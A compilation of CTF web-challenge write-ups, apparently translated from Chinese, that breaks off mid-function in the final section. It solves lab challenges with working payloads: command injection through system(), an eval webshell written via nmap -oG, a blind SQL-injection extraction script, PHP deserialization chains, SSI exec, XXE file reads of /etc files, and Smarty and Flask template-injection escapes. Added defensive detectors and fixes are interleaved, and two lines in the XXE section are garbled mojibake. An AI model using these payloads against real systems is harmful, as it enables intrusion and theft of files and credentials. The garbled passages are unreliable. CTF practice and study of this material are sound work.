header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
if (isset($_GET['md5'])){
    $md5=$_GET['md5'];
    if ($md5==md5($md5))
        echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
    else
        die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>
str_ireplace is the case-insensitive version of str_replace().
Function prototype:
str_ireplace ( mixed $search , mixed $replace , mixed $subject , int &$count = ? ) : mixed
The function returns a string or an array in which every occurrence of search in subject has been replaced by replace (ignoring case).
Running under PHP 5.6:
<?php
var_dump(intval('0x1234'));
var_dump(intval('0x1234'+1));
?>
For a string, intval stops at the first non-numeric character and returns the number in front of it; after adding 1, the string is processed as hexadecimal. Scientific notation can be used instead:
<?php
var_dump(intval('1e5'));
var_dump(intval('1e5'+1));
?>
For the md5 weak-type comparison, a script can be used:
import hashlib

def run():
    i = 0
    while True:
        text = '0e{}'.format(i)
        # a fresh hash object for every candidate: reusing one object and
        # calling update() would hash the concatenation of all candidates so far
        m = hashlib.md5(text.encode('utf-8')).hexdigest()
        print(text, ' ', m)
        # "0e" followed only by digits is a numeric string equal to 0 in PHP
        if m[0:2] == '0e':
            if m[2:].isdigit():
                print('find it:', text, ":", m)
                break
        i += 1

run()
References
https://blog.csdn.net/SopRomeo/article/details/106237931
The result is:
0e215962017
That bypasses the second check.
!strstr($get_flag," ") means no spaces are allowed, so $IFS$9 or %09 can stand in for a space. A word on the difference between ${IFS}, $IFS and $IFS$9: $IFS is the field separator in Linux shells. With cat$IFSa.txt alone, bash takes the whole of IFSa as the variable name, so the command cannot run; adding {} pins down the variable name, and likewise appending a $ acts as a terminator. $9 is the ninth positional parameter of the current shell process, which is an empty string, so $9 adds nothing and merely separates what precedes it from what follows.
First find where the flag is; enter the URL:
/fl4g.php?num=1e5&md5=0e215962017&get_flag=ls
The flag file turns out to be:
fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
cat can be bypassed with ca\t or more.
Enter the URL:
/fl4g.php?num=1e5&md5=0e215962017&get_flag=more$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
That gives the flag.
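The md5 check above passes because PHP's == compares two numeric strings as numbers, and "0e" followed by digits is 0 × 10^n = 0. The following Python script is an added example, not code from the challenge or from the writeup: it emulates PHP's numeric-string rule and loose comparison (a simplified reimplementation written here, not PHP's code), shows the strict comparison that closes the hole, and contains a bounded search with a fresh hash object per candidate.

```python
import hashlib
import hmac
import re

# PHP's numeric-string shape: optional leading whitespace, sign, digits with an
# optional fraction, optional exponent. "0e215962017" is 0 x 10^215962017 = 0.
PHP_NUMERIC = re.compile(r'^\s*[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?$')

def is_php_numeric(s):
    return PHP_NUMERIC.match(s) is not None

def php_loose_eq(a, b):
    """Emulate PHP's == between two strings: numeric strings compare as numbers."""
    if is_php_numeric(a) and is_php_numeric(b):
        return float(a) == float(b)
    return a == b

def php_strict_eq(a, b):
    """PHP's === (same type and same bytes); compare_digest also avoids timing leaks."""
    return hmac.compare_digest(a.encode(), b.encode())

def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()

def is_zero_hash(hexdigest):
    """True when the digest is '0e' followed only by decimal digits."""
    return re.fullmatch(r'0e\d+', hexdigest) is not None

def find_zero_hash(prefix, start, limit):
    """First prefix+str(i) with i in [start, start+limit) whose md5 is a zero-valued
    numeric string, or None. Each candidate gets its own hash object."""
    for i in range(start, start + limit):
        text = prefix + str(i)
        if is_zero_hash(md5_hex(text)):
            return text
    return None
```

The defensive point is the last comparison: $md5 === md5($md5) (or hash_equals()) never treats two different strings as equal, whereas == does whenever both parse as numbers.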
References
https://www.cnblogs.com/h3ng/p/12976168.html
[SWPU2019]Web1
todo: the injection does not work.
[网鼎杯 2020 朱雀组]Nmap
Opening the page shows a hint that the nmap command is to be used; refer to a challenge done earlier:
[BUUCTF 2018]Online Tool
Try the earlier command:
' <?php @eval($_POST["password"]);?> -oG shell.php '
The page responds with: hacker. So some keyword is being filtered.
Method 1
Try replacing php with phtml:
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
Or:
' <? @eval($_POST["hack"]);?> -oG hack.phtml '
Standard PHP 5 supports the following four PHP tags:
- the <?php tag
- the <? tag
- the <% tag (disabled by default; removed in PHP 7)
- the <script language="php"> tag (removed in PHP 7)
References
https://www.leavesongs.com/PENETRATION/dynamic-features-and-webshell-tricks-in-php.html
Visit:
http://3978be0d-795e-4584-ade1-22c6014582a1.node3.buuoj.cn/hack.phtml
The file is reachable. In AntSword, right-click the blank area, choose Add, and fill in the following:
URL address: http://3978be0d-795e-4584-ade1-22c6014582a1.node3.buuoj.cn/hack.phtml
Connection password: hack
Site note: (leave empty)
Encoding: UTF8
Connection type: PHP
Leave everything else unchanged. The password can be anything as long as it matches $_POST["hack"].
After connecting, browse the site files; the flag is in the web root.
References
https://www.cnblogs.com/h3ng/p/12989057.html
Method 2
-iL reads the scan targets from the file inputfilename. -oN writes the scan results in human-readable form to the file logfilename.
Enter:
' -iL /flag -oN vege.txt '
Visit:
http://3978be0d-795e-4584-ade1-22c6014582a1.node3.buuoj.cn/vege.txt
That gives the flag.
References
https://zhuanlan.zhihu.com/p/145906109
https://wgf4242.github.io/ctf/writeup/2020-网鼎杯朱雀组writeup.html#web-0x1-nmap
[MRCTF2020]PYWebsite
Opening the page shows that the flag has to be purchased; first scan with dirsearch:
python dirsearch.py -u http://node3.buuoj.cn:29832/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429 -w db/mylist.txt
mylist.txt is a scanning wordlist I created myself. The scan finds flag.php; visiting flag.php shows the message:
Come on, I have studied network security for half an hour too, you cannot fool me! I have saved the buyer's IP, and clearly you have not bought it. The verification logic is on the back end; apart from the buyer and myself, nobody can see the flag, so go and buy it.
The message says the author can see the flag, which means local access is enough, so we add an X-Forwarded-For header. Build the request in Burp Suite:
GET /flag.php HTTP/1.1
Host: node3.buuoj.cn:29832
X-Forwarded-For: 127.0.0.1
Note the two blank lines at the end. Sending the request returns the flag.
References
https://www.cnblogs.com/h3ng/p/12899957.html
[极客大挑战 2019]FinalSQL
Entering the site shows the message:
Hello everyone! I am cl4y, a freelance WEB programmer with two and a half years of practice. I know php, PYTHON, mysql and SQL blind injection
So SQL blind injection is probably needed, and we have to find the injection point. Following the hint there are five points to click, but it says there is a sixth, so modify the current URL:
/search.php?id=6
This should be the injection point. A Python script using binary search retrieves the flag:
import re
import requests

url = "http://8ca9d6e1-3757-47ac-950d-0ab7df0f5935.node3.buuoj.cn/search.php"

def payload(i, j):
    # returns 1 when the i-th character of the query result is greater than j
    sql = "0^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res

def exp():
    flag = ''
    for i in range(1, 10000):
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        finalchar = (low + high + 1) // 2
        flag += chr(finalchar)
        if flag[-1] == '}':
            break
    print(flag)

exp()
XOR injection is used here: 0^1=1 and 0^0=0. The page displays different content for id=1 and id=0, so if
0^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d
returns 1, the expression after the XOR operator evaluated to 1. The script tests whether the current character of the query result lies in one half of the range, narrows the range, and finally pins down the character; repeating this for each position recovers the whole string.
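Seen from the server side, the extraction above is very noisy: one client sends a long run of requests to the same endpoint whose query differs only in two numbers, each carrying ord(substr(...)) followed by a comparison. The following Python script is an added example, not part of the writeup: it runs a simple detector over constructed access-log lines (no real traffic; the lines are built inline from the probe template on this page) and reports client IPs whose decoded query strings match blind-injection signatures more than a threshold number of times.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus

# Constructed combined-style access-log lines: two benign lookups from 10.0.0.5
# and five probes from 10.0.0.9 built from the page's payload template.
_PROBE = '0^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)'
SAMPLE_LOG = '\n'.join(
    ['10.0.0.5 - - [29/Apr/2021:10:00:01 +0000] "GET /search.php?id=1 HTTP/1.1" 200 512',
     '10.0.0.5 - - [29/Apr/2021:10:00:03 +0000] "GET /search.php?id=6 HTTP/1.1" 200 498']
    + ['10.0.0.9 - - [29/Apr/2021:10:00:%02d +0000] "GET /search.php?id=%s HTTP/1.1" 200 512'
       % (10 + n, quote(_PROBE % (pos, mid), safe=''))
       for n, (pos, mid) in enumerate([(1, 79), (1, 103), (1, 91), (2, 79), (2, 67)])]
)

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Signatures of boolean- and time-based blind extraction, matched on the decoded query.
BLIND_SIGNATURES = [
    re.compile(r'(?:ord|ascii)\s*\(\s*substr', re.I),   # per-character comparison
    re.compile(r'\bsleep\s*\(\s*\d', re.I),            # time-based variant
    re.compile(r'\bbenchmark\s*\(', re.I),
]

def decode_target(target):
    return unquote_plus(target)

def is_blind_probe(decoded_target):
    return any(sig.search(decoded_target) for sig in BLIND_SIGNATURES)

def template_of(decoded_target):
    """Collapse numbers so requests differing only in position/threshold look alike."""
    return re.sub(r'\d+', '#', decoded_target)

def detect_blind_sqli(log_text, threshold=3):
    """Return {ip: {'probes': n, 'templates': [...]}} for IPs with at least threshold probes."""
    per_ip = defaultdict(lambda: {'probes': 0, 'templates': set()})
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        decoded = decode_target(m.group('target'))
        if is_blind_probe(decoded):
            rec = per_ip[m.group('ip')]
            rec['probes'] += 1
            rec['templates'].add(template_of(decoded))
    return {ip: {'probes': r['probes'], 'templates': sorted(r['templates'])}
            for ip, r in per_ip.items() if r['probes'] >= threshold}
```

The template count is the useful second signal: a binary-search extraction produces many requests that collapse to a single template, which distinguishes it from a scanner spraying unrelated payloads. The fix on the application side remains a parameterised query for id rather than string concatenation.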
References
https://www.cnblogs.com/wangtanzhi/p/12305052.html
[NPUCTF2020]ReadlezPHP
Press F12 to view the source; it contains a link:
<p>百万前端的NPU报时中心为您报时:<a href="./time.php?source"></a></p>
Visit the link:
/time.php?source
The source code appears:
<?php
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}
@$ppp = unserialize($_GET["data"]);
The data is passed to unserialize, so construct a payload:
<?php
class HelloPhp {
    public $a = "phpinfo()";
    public $b = "assert";
}
$a = new HelloPhp();
echo serialize($a);
?>
The assert function checks whether an expression holds and returns true or false; the important point is that it executes the expression. If the expression is a function call such as assert("echo(1)"), it outputs 1, whereas assert("echo 1;") produces no output.
Enter the URL:
/time.php?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}
Search for flag in the phpinfo() page to get the flag.
References
https://www.cnblogs.com/h3ng/p/12890693.html
[BJDCTF2020]EasySearch
Scan with dirsearch:
python dirsearch.py -u http://6cc91237-51e2-47fb-ad7c-a5d2cccebdc8.node3.buuoj.cn/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429 -w db/mylist.txt
This finds /index.php.swp; visiting /index.php.swp gives:
<?php
ob_start();
function get_hash(){
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
    $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];
    $content = uniqid().$random;
    return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
    $admin = '6d0bc1';
    if ( $admin == substr(md5($_POST['password']),0,6)) {
        echo "<script>alert('[+] Welcome to manage system')</script>";
        $file_shtml = "public/".get_hash().".shtml";
        $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
        $text = '
        ***
        ***
        <h1>Hello,'.$_POST['username'].'</h1>
        ***
        ***';
        fwrite($shtml,$text);
        fclose($shtml);
        ***
        echo "[!] Header error ...";
    } else {
        echo "<script>alert('[!] Failed')</script>";
    }
}else
{
***
}
***
?>
Login succeeds when the first six hex digits of the password's md5 equal 6d0bc1.
Python script:
import hashlib

i = 0
while True:
    m = hashlib.md5(str(i).encode('utf-8')).hexdigest()
    if m[0:6] == '6d0bc1':
        print(i, " ", m)
        break
    i += 1
todo: this may be too slow; speed it up with multithreading?
Construct the request:
POST /index.php HTTP/1.1
Host: 6cc91237-51e2-47fb-ad7c-a5d2cccebdc8.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=123&password=2020666
The response contains the header:
Url_is_here: public/05824f6f3fbef89116dee0e9a8da86e3330ab96b.shtml
Visiting this file shows:
Hello,123
data: Wednesday, 28-Apr-2021 15:02:31 UTC
Client IP: 172.16.128.254
Nothing useful there. Searching for shtml vulnerabilities turns up the SSI directive <!--#exec cmd="command"-->, which allows arbitrary remote command execution.
References
http://zone.secevery.com/article/1142
Construct the request:
POST /index.php HTTP/1.1
Host: 6cc91237-51e2-47fb-ad7c-a5d2cccebdc8.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

username=<!--#exec cmd="find / -name flag*"-->&password=2020666
The response contains the header:
Url_is_here: public/501795be0e8b58d9ad8c3047f5302a5844845344.shtml
Visiting this file reveals the flag file:
/var/www/html/flag_990c66bf85a09c664f0b6741840499b2
Construct the request:
POST /index.php HTTP/1.1
Host: 6cc91237-51e2-47fb-ad7c-a5d2cccebdc8.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

username=<!--#exec cmd="cat /var/www/html/flag_990c66bf85a09c664f0b6741840499b2"-->&password=2020666
Visit the file named in the response header again to get the flag.
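The defect in the recovered index.php is that the raw username is interpolated into a file whose .shtml extension makes the web server run it through the SSI processor, so any <!--#exec ...--> in the field becomes a command. The following Python script is an added example, not code from the challenge: it contains a small detector for SSI directives, the vulnerable interpolation beside an HTML-escaped version that the SSI processor cannot act on, and the two payloads from this page as constructed test inputs.

```python
import html
import re

# Directives understood by Apache mod_include and nginx ssi; all start with "<!--#".
SSI_DIRECTIVE = re.compile(
    r'<!--\s*#\s*(exec|include|echo|config|set|fsize|flastmod|printenv|if|elif|else|endif)\b',
    re.I)

def contains_ssi_directive(text):
    """Detection check, usable on incoming form fields or on generated .shtml files."""
    return SSI_DIRECTIVE.search(text) is not None

def render_greeting_vulnerable(username):
    """What the recovered code does: the raw POST value lands in an .shtml page."""
    return '<h1>Hello,' + username + '</h1>'

def render_greeting_fixed(username):
    """HTML-escape first: '<!--#' becomes '&lt;!--#', which is plain text to SSI."""
    return '<h1>Hello,' + html.escape(username, quote=True) + '</h1>'

# Constructed inputs: a plain name and the two SSI payloads shown on this page.
SAMPLES = {
    'plain': '123',
    'find': '<!--#exec cmd="find / -name flag*"-->',
    'cat': '<!--#exec cmd="cat /var/www/html/flag_990c66bf85a09c664f0b6741840499b2"-->',
}
```

Escaping fixes the injection, but the stronger fix is structural: do not write user-controlled content into files that the server executes (no .shtml, or SSI disabled for the public/ directory), and note that a six-hex-digit md5 prefix is only a 24-bit check, which is why the password search above terminates quickly.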
References
https://blog.csdn.net/SopRomeo/article/details/105225341
https://www.cnblogs.com/wangtanzhi/p/12354394.html
[MRCTF2020]Ezpop
Opening the page shows the source code:
Welcome to index.php
<?php
class Modifier {
    protected $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}
Magic methods:
- __construct(): called when an object is created
- __destruct(): called when an object is destroyed
- __toString(): called when an object is used as a string
- __sleep(): runs before an object is serialized
- __wakeup(): called immediately after unserialization (can be bypassed by making the element count in the serialized object not match)
- __get(): called when reading a member variable, i.e. when a non-existent or inaccessible property is accessed
- __set(): called when setting a member variable
- __invoke(): the method that responds when an object is called as a function
- __call(): executed when an inaccessible method of an object is called
References
https://www.jianshu.com/p/40ab1c531fcc
The exploitation idea is:
- The Modifier class can include a file; when $value points at flag.php, the flag is displayed. To get there, append() must be called, and __invoke calls append.
- The next question is how to reach __invoke. It runs when a Modifier object is called as a function. Checking the code, the Test class contains:
public function __get($key){
    $function = $this->p;
    return $function();
}
If p is a Modifier object, return $function(); triggers __invoke.
- So how do we reach __get? It runs only when a property that does not exist on Test is read. The Show class contains:
public function __toString(){
    return $this->str->source;
}
If str is a Test object, reading the non-existent property source triggers __get.
- And how is __toString triggered? It is called when a Show object is used as a string. We find:
public function __construct($file='index.php'){
    $this->source = $file;
    echo 'Welcome to '.$this->source."<br>";
}
If a Show object is passed as the parameter when constructing a Show, __toString is called. (On the server, unserialize() never runs __construct; there it is __wakeup(), whose preg_match() treats $this->source as a string, that calls __toString.)
- And how is __construct called? Simply instantiate the class.
Reversing the steps above gives the complete PHP code:
<?php
class Modifier {
    protected $var = "php://filter/convert.base64-encode/resource=flag.php";
}
class Show{
    public $source;
    public $str;
    // default of null keeps new Show() valid on PHP 7+, where a missing required argument is an error
    public function __construct($file = null){
        $this->source = $file;
    }
}
class Test{
    public $p;
}
$a = new Show();
$a->str = new Test();
$a->str->p = new Modifier();
$b = new Show($a);
echo urlencode(serialize($b));
?>
$var cannot simply be flag.php; php://filter is needed to read it base64-encoded, otherwise include just executes the file and nothing is shown.
urlencode(serialize($b)) is needed because a protected property, once serialized, has the name \x00*\x00var, which contains the invisible byte \x00; a plain echo serialize($b) does not show the \x00.
Enter the result in the URL:
/?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
Decoding the page's response from base64 gives the flag.
[NCTF2019]True XML cookbook
Opening the page shows a login form. Enter any username and password and intercept with Burp Suite:
POST /doLogin.php HTTP/1.1
Host: 9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn
Content-Length: 61
Accept: application/xml, text/xml, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56
Content-Type: application/xml;charset=UTF-8
Origin: http://9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn
Referer: http://9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,en-GB;q=0.6
Connection: close

<user><username>123</username><password>123</password></user>
The header Content-Type: application/xml;charset=UTF-8 suggests that an XXE (XML external entity) injection vulnerability may exist. Try an XXE attack, first looking for a point where the input is echoed. Construct the request:
POST /doLogin.php HTTP/1.1
Host: 9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn
Content-Type: application/xml;charset=UTF-8
Content-Length: 106

<!DOCTYPE a[
<!ENTITY b "abc">
]>
<user><username>&b;</username><password>admin</password></user>
The response is:
<result><code>0</code><msg>abc</msg></result>
There is an echo point, so XXE is present. Try pseudo-protocols such as file:// and php:// to fetch files. Construct the request:
POST /doLogin.php HTTP/1.1
Host: 9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn
Content-Type: application/xml;charset=UTF-8
Content-Length: 126

<!DOCTYPE a[
<!ENTITY b system "file:///flag.php">
]>
<user><username>&b;</username><password>admin</password></user>
The response reports an error: no such file. Try various Linux configuration files:
- /etc/hosts: stores the domain-name resolution cache
- /etc/passwd: user accounts
- /proc/net/arp: the ARP table, with the device (dev) entry of each network interface
Construct the request:
POST /doLogin.php HTTP/1.1
Host: 9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn
Content-Type: application/xml;charset=UTF-8
Content-Length: 127

<!DOCTYPE a[
<!ENTITY b SYSTEM "file:///etc/hosts">
]>
<user><username>&b;</username><password>admin</password></user>
ÏìӦûÓз¢ÏÖÓмÛÖµµÄÄÚÈÝ¡£
¹¹ÔìÇëÇó·ÃÎÊ/proc/net/arp :
POST /doLogin.php HTTP/1.1
Host: 9d784dd6-4cb7-49c5-b356-10eb8b80e9df.node3.buuoj.cn
Content-Type: application/xml;charset=UTF-8
Content-Length: 130

<!DOCTYPE a[
<!ENTITY b SYSTEM "file:///proc/net/arp">
]>
<user><username>&b;</username><password>admin</password></user>
The response lists a server, 10.0.8.2; use C-segment sniffing to find a reachable internal server.
The C segment means the other hosts on the same internal network segment. Every IP has four segments A, B, C and D; for example, in 192.168.0.1 the A segment is 192, B is 168, C is 0 and D is 1. C-segment sniffing means taking over one of the hosts in the same C segment, that is, one of the hosts with a D segment of 1-255, by probing them with tools.
Brute-force the D segment with Burp Suite; the response for 10.0.8.11 contains the flag.
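Every request in this section works because the login endpoint parses a client-supplied document with entity processing enabled. The following Python script is an added example, not the challenge's code: it contains a naive parser that, like the server above, substitutes the internal entity (the stdlib xml.etree expands internal entities), and a hardened variant that aborts on the first DOCTYPE via an expat handler, so neither internal nor SYSTEM entities are ever processed. The three request bodies are constructed inline after the ones shown on this page.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed request bodies mirroring the three on this page.
PLAIN_DOC = b'<user><username>123</username><password>123</password></user>'
INTERNAL_ENTITY_DOC = (b'<!DOCTYPE a [\n<!ENTITY b "abc">\n]>\n'
                       b'<user><username>&b;</username><password>admin</password></user>')
EXTERNAL_ENTITY_DOC = (b'<!DOCTYPE a [\n<!ENTITY b SYSTEM "file:///etc/hosts">\n]>\n'
                       b'<user><username>&b;</username><password>admin</password></user>')

class DtdNotAllowed(ValueError):
    pass

def _fields(root):
    """Map child tag -> text for the <user> element."""
    return {child.tag: (child.text or '') for child in root}

def parse_login_naive(xml_bytes):
    """Entity-expanding parse: the internal entity is substituted into username."""
    return _fields(ET.fromstring(xml_bytes))

def reject_dtd(xml_bytes):
    """Abort as soon as a DOCTYPE appears; entity declarations can only live inside one."""
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed('DOCTYPE %r not allowed in a login request' % name)
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)

def parse_login_hardened(xml_bytes):
    """Refuse any document carrying a DTD before handing it to the real parser."""
    reject_dtd(xml_bytes)
    return _fields(ET.fromstring(xml_bytes))

def is_safe_login_document(xml_bytes):
    try:
        parse_login_hardened(xml_bytes)
    except DtdNotAllowed:
        return False
    return True
```

The <msg>abc</msg> echo in the response above is the naive behaviour; with the hardened parser the request is rejected before the entity is ever looked at, which also closes the file:// and /proc/net/arp reads, since those are just external entities with different URIs. In PHP the equivalent is libxml_disable_entity_loader() on older versions, or simply not loading documents with a DTD.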
References
https://blog.csdn.net/weixin_43221560/article/details/108152738
https://www.cnblogs.com/renhaoblog/p/13026361.html
https://www.icode9.com/content-4-802965.html
[CISCN2019 华东南赛区]Web11
todo: why would one think of {if}?
Opening the page, the footer says: Build with Smarty
Construct the request:
GET / HTTP/1.1
Host: node3.buuoj.cn:26290
X-Forwarded-For: {if system("ls /")}{/if}
The root directory listing is output and contains the flag file.
Construct the request:
GET / HTTP/1.1
Host: node3.buuoj.cn:26290
X-Forwarded-For: {if system("cat /flag")}{/if}
That gives the flag.
References
https://webcache.googleusercontent.com/search?q=cache:Stzr1ION8tcJ:https://www.cnblogs.com/kanowill/p/12856683.html+&cd=1&hl=zh-CN&ct=clnk
https://www.freebuf.com/column/219913.html
[GYCTF2020]FlaskApp
Method 1: reading files via SSTI
Opening the challenge, the hint says it is the Flask framework, so SSTI is needed.
On the base64 decode page, entering a string that is not valid base64 raises an error, and the error message mentions /app/app.py; clicking it shows the app.py source.
@app.route('/decode',methods=['POST','GET'])
def decode():
    if request.values.get('text') :
        text = request.values.get("text")
        text_decode = base64.b64decode(text.encode())
        tmp = "结果 : {0}".format(text_decode.decode())
        if waf(tmp) :
            flash("no no no !!")
            return redirect(url_for('decode'))
        res = render_template_string(tmp)
But this is only part of it; to get the complete app.py source, app.py has to be read.
base64-encode the following string:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__.__builtins__.open('app.py','r').read() }}{% endif %}{% endfor %}
Or:
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__.open('app.py','r').read() }}
Then decode it on the decode page; the page echoes the app.py source, revealing the blacklist:
black_list = [&
Words such as flag, import and os are blocked.
Try listing the directory by base64-encoding the following string:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__.__builtins__['__imp'+'ort__']('o'+'s').listdir('/') }}{% endif %}{% endfor %}
Or:
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}
Then decode it on the decode page; the flag file is this_is_the_flag.txt. base64-encode the following string:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}
Or:
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__.open('/this_is_the_fl'+'ag.txt','r').read()}}
Slicing can be used instead of string concatenation:
{{''.__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__.open('txt.galf_eht_si_siht/'[::-1],'r').read()}}
Then decode it on the decode page to get the flag.
todo: explain the payload.
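The payloads above never name open() or os as a template global; they walk from an empty list to object, scan every loaded subclass for warnings.catch_warnings, and take open() from the __builtins__ of that class's module. The following Python script is an added example, not code from the challenge or the writeup: it performs the same walk in plain Python against a temporary file it creates itself, shows why the hard-coded index [75] is brittle, and applies a simplified version of the rule Jinja2's SandboxedEnvironment uses (a reimplementation written here, not jinja2's code) to list which attributes in the page's payload a sandbox would refuse.

```python
import os
import re
import tempfile
import warnings  # makes sure warnings.catch_warnings is a loaded subclass of object

def object_subclasses():
    """The payload's starting point: [] -> list -> object -> every loaded subclass."""
    return [].__class__.__base__.__subclasses__()

def find_subclass(name):
    """The {% for c in ... %}{% if c.__name__=='catch_warnings' %} loop, in plain Python."""
    for cls in object_subclasses():
        if cls.__name__ == name:
            return cls
    return None

def index_of_subclass(name):
    """The number behind a hard-coded [75]: it depends on what this interpreter has imported."""
    for i, cls in enumerate(object_subclasses()):
        if cls.__name__ == name:
            return i
    return -1

def builtins_of(cls):
    """cls.__init__.__globals__['__builtins__'] is a dict in imported modules and the
    builtins module in __main__; Jinja's attribute-or-item lookup hides that difference."""
    b = cls.__init__.__globals__['__builtins__']
    return b if isinstance(b, dict) else vars(b)

def read_file_via_gadget(path):
    """open() reached without 'open' or 'os' ever appearing as a template global."""
    open_fn = builtins_of(find_subclass('catch_warnings'))['open']
    with open_fn(path, 'r') as fh:
        return fh.read()

def is_safe_attribute(name):
    """Simplified sandbox rule (assumption: illustration of the leading-underscore check
    Jinja2's SandboxedEnvironment applies, not its actual code)."""
    return not name.startswith('_')

def blocked_attributes(template_expr):
    """Attribute names in a template expression that the sandbox rule would refuse."""
    return sorted({n for n in re.findall(r'\.(\w+)', template_expr) if not is_safe_attribute(n)})

def demo():
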